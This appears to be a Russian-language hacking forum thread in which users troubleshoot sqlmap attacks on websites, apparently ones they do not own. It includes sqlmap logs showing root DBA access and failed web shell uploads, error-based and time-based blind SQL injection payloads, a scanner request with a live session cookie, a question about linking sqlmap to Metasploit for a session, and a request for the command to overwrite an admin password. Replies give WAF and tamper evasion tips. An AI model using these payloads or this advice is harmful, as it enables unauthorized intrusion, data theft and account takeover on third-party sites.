надо ставить оригинальный параметр. ты ставишь или пустой или уже разкрученый параметр да и в целом надо проверять ручками есть ли вообще то там дырка.
Parameter: #1* (URI) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) [04:43:21] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 [04:43:21] [INFO] testing if current user is DBA [04:43:21] [INFO] fetching current user [04:43:22] [INFO] retrieved: 'root@localhost' current user is DBA: True не возможно залить шелл [04:44:04] [WARNING] unable to upload the file stager on '/var/www/' [04:44:04] [INFO] trying to upload the file stager on '/var/www/menu/-1/' via LIMIT 'LINES TERMINATED BY' method Не получается ничего. [04:45:04] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 [04:45:04] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER sql-shell> [04:00:51] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported Подскажите пожалуйста что можно сделать ???
Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://site.com:80/Help/HelpIndex.html?HelpName=Earn money&ThemeID=17 AND 2864=2864 --- [16:58:45] [INFO] testing MySQL [16:58:45] [WARNING] the back-end DBMS is not MySQL [16:58:45] [INFO] testing Oracle [16:58:45] [WARNING] the back-end DBMS is not Oracle [16:58:45] [INFO] testing PostgreSQL [16:58:45] [WARNING] the back-end DBMS is not PostgreSQL [16:58:45] [INFO] testing Microsoft SQL Server [16:58:45] [WARNING] the back-end DBMS is not Microsoft SQL Server [16:58:45] [INFO] testing SQLite [16:58:45] [WARNING] the back-end DBMS is not SQLite [16:58:45] [INFO] testing Microsoft Access [16:58:45] [WARNING] the back-end DBMS is not Microsoft Access [16:58:45] [INFO] testing Firebird [16:58:45] [WARNING] the back-end DBMS is not Firebird [16:58:45] [INFO] testing SAP MaxDB [16:58:45] [WARNING] the back-end DBMS is not SAP MaxDB [16:58:45] [INFO] testing Sybase [16:58:45] [WARNING] the back-end DBMS is not Sybase [16:58:45] [INFO] testing IBM DB2 [16:58:45] [WARNING] the back-end DBMS is not IBM DB2 [16:58:45] [INFO] testing HSQLDB [16:58:45] [WARNING] the back-end DBMS is not HSQLDB [16:58:45] [INFO] testing H2 [16:58:45] [WARNING] the back-end DBMS is not H2 [16:58:45] [INFO] testing Informix [16:58:45] [WARNING] the back-end DBMS is not Informix [16:58:45] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system [*] ending @ 16:58:45 /2020-06-28/ Кто сталкивался? В чем проблема?
На соседнем борде обсуждали что типа одна скуля не отдает DBMS а вторая может и отдать.. Ищи еще скули на сайте Так же грешат на WAF и предполагают что тип уязвимости - NoSQL Потому и не может определить dbms
Взаимодействие sqlmap и metasploit - что не так? Дампит нормально а коннект отказывается создавать , все пути прописаны правильно... Гугл поиск по запросу "unable to prompt for an out-of-band session" ничего не выдал вразумительного ..
Вечер добрый.Не первый раз сталкиваюсь с ситуацией когда сканер показал sql и даже показал базу данных.Но sqlmap почему-то не хочет его брать,говорит нельзя произвести инъекцию. Ссылка get https://www.example.com/example.php?langid=test&Product=1. уязвимый параметр "langid". Есть готовый пэйлоад со сканера. -1%5c%27%2b(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))--+1 каким образом можно его указать или подтолкнуть?Кроме --technique= Есть кто сталкивался и решал такое?
Сам уязвимый параметр можно укозать *, ставишь с параметром -v3 и смотришь на каком моменте он ломается, далее руками смотришь, что его ломает и подбираешь под это дело тампер или пишешь свой.
[QUOTE = "winstrool, post: 4410186, member: 33917"] Сам уязвимый параметр можно укозать * , ставишь с параметром -v3 и смотришь на каком моменте он ломается, далее руками смотришь, что его ломает и подбираешь под это дело тампер или пишешь свой. [/ QUOTE] Видел пост на кодебу, как ребята вставляют пейлоады через preffix и suffix.Но до конца не разобрался
Ну судя по скрину, у вас есть уязвимость в УРЛе, а дальше: на сервере стоит очень маленький параметр LimitRequestLine или же large_client_header_buffers Или же у вас оооооочень длинные запросы Ну или же стоит какая-либо WAF, которая вместо 404 отдаёт ошибку 414 (что вряд-ли) Так что сначала выясните какую максимальную длину поддерживает сервер, банально с помощью bash: Code: baseurl="http://site.com/"; for i in {1..1000}; do baseurl=$baseurl'A'; length=$(echo -n "$baseurl"|wc -c); response=$(curl -I -s "$baseurl" | grep "HTTP\/" | cut -d " " -f 2); echo "Length:$length Response-Code: $response URL: $baseurl"; done Затем пропустите трафик через свой прокси (burp, charlie..) и посмотрите что идёт от скульмапа Code: sqlmap --proxy http://localhost:8080/ ну и там уже по обстоятельствам.
Доброго времени суток. Имеется на сайте Blind SQL Injection. Сканировал акунетиксом. Акунетикс использует "XOR" Вот лог. Также на сайте имеется php code injection. C этим не знаком. Не знаю как правильно скормить скулю мапу. Буду благодарен за хоть какую-то подсказку Spoiler: Лог The vulnerability affects https://www.site.com/ , /<s>/<s>/<s>/[*]/<s>.html Discovered by Blind SQL Injection Attack Details arrow_drop_up Path Fragment input /<s>/<s>/<s>/[*]/<s>.html was set to 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z Tests performed: 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 13.583 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 14.42 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 8.496 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 4.763 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.538 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.613 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 13.94 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.891 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.737 Original value: Sneaker HTTP Request arrow_drop_up GET /Sale/Damen/Schuhe/0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z/Sneaker-mit-abgedeckter-Schnuerung-weiss.html HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: https://www.site.com/ Cookie: language=0;sid=kk35ife9b0guk613m5pgdf9b72;sid_key=oxid Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Host: www.site.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Connection: Keep-alive
--is-dba: True. Могу я изменить пароль админа? Какая команда должна быть? Есть несколько баз данных, текущая 'admin' в ней таблица 'users' и колонку пароль 'password'. Я попробовал так --sql-query "UPDATE users SET password = '123' WHERE email = '[email protected]';" Выбило ошибку "execution of non-query SQL statements is only available when stacked queries are supported". Как правильно сделать?